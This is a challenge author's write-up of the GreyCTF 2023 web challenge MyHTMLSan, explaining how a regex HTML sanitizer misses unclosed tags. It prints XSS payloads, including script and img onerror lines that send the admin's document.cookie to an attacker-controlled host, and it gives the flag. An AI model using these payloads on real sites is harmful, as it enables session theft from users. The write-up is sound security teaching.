Skip to main content
  1. My Blog Posts and Stories/

GreyCTF 2023 Finals: MyHTMLSan

·855 words·5 mins

This is the author’s writeup for the challenges MyHTMLSan in the web category.

This describes the intended solution when I made the challenge.

Challenge description #

LiveOverflow inspired me to host html files, I hope I made them safe enough.

  • Junhua

There was no source code for this challenge, only a link to the website.

My Notes #

Notes to future self when setting up this challenge. #

  • Spend more time to check for unexpected solutions

The Website #

MyHTMLService Main Page
myHTMLService Main Page
When we first visit the website, we are greeted with a simple website with a form where a user can submit their HTML Code. We also see an embed LiveOverflow Video explaining the HTML Specification.

After Submission
After Submission
After submitting our HTML code, we are greeted with a page that shows us the output of our HTML code (if any). There is also a Report to admin button that we can use to report this link.

The submission location is using UUID to prevent users from guessing the location of other submissions.

Looking at the question #

As you can see from the image above, we can see that normal text is not sanitized by the page. Let us try to use some HTML Tags.

After submitting <h1>test</h1>, we see the following output.

After submitting <code>&lt;h1&gt;test&lt;/h1&gt;</code>
After submitting <h1>test</h1>

We can see from the above that the h1 tags were stripped.

To complete this challenge, we will have to find some sort of XSS vulnerability within the website and prompt the admin to visit the website to exploit it.

Finding the XSS vulnerability #

Another hint that we have yet to look into is the LiveOverflow video that is embedded in the website. Within the video, he talks about how he has “discovered” a html sanitizer bypass that allows him to inject javascript into the website but eventually found out that it was a perk of the HTML specification.

He also mentions specifically that any opening tags < followed by numbers, IE: [0-9] are not counted as HTML tags and will be rewritten.

Let us try the example that he gave in the question, <22 foo="bar<h1>">test</22>.

After submitting new payload
After submitting new payload

We can see from the image that this too was stripped from the output.

Hmm… maybe there was something else in the video that hints at the answer for this question.

Towards the end of the video, he talks about how HTML Cannot be parsed using regex. He then shows us an example of a regex that he found online that can parse HTML.

Perhaps the sanitizer is made from regex.

Regex from the video #

The post that he mentioned in the video here

The main regex that was shown is <(?:"[^"]*"['"]*|'[^']*'['"]*|[^'">])+>. This regex is used to match HTML tags. However, there are some issues with this regex.

It does not match any tags that do not have a closing tag. (IE: <br instead of <br />)

Let us try it out on the website.

Unclosed Tags
Unclosed h1 tag

For the above result, we submitted the payload <h1 without the closing tag. As you can see from the rendered HTML, the h1 tag was not sanitized.

The solution #

With that, we can make use of different tags to inject our javascript payload. There are multiple solutions.

Script Payload #

<script src="https://github.com/Jh123x/payload/raw/main/alert.js"

Script Payload
Script Payload

With the payload above, it was shown correctly as a script tag on the page.

Chrome Blocked Script
Chrome blocked the script

However, the chrome browser blocked the loading of the script.

This is due to a feature in chrome which blocks Cross Origin Reads for more information you can visit the link above.

TLDR: Chrome blocks the loading of scripts from other domains which are not of content type text/javascript.

Thus, to make it work, we will have to make use of tools like webhook.site.

Edit Webhook Site page content
Editing page content to be text/javascript with an alert script

Over here we can edit the payload that appears when someone visits our website.

<script src="https://webhook.site/7ee53c33-a346-45da-8183-99142b31efcd"

Now with the above payload, we should be able to load any javascript that we want.

Alert Popped
Successful alert

Now that we can trigger an alert, we can simply change the script to a redirect request before reporting the page to the admin to get the flag.

document.location.href = "<your site here>?cookie=" + document.cookie;

We can simply redirect to the page that we want with the admin’s cookie and retrieve the flag.

Img Payload #

There is also an alternative using the img tag as well

<img src="aa" onerror="document.location.href='<site here>?cookies='+document.cookie"

This will have the same effect as the script tag above (and is faster).

Flag #

Flag: grey{r3geX_1s_N0t_4_htm1_cee664daa169f7cdb53f87ab810ccb15}

  1. LiveOverflow’s video on HTML Specification to learn about parsing HTML with Regex
  2. Webhook.Site to have a attacker controlled server to get cookies
  3. CORB to learn about why chrome blocks the script from loading
  4. MyHtmlSan Source Code
  5. StackOverflow Post on why you should not use regex on html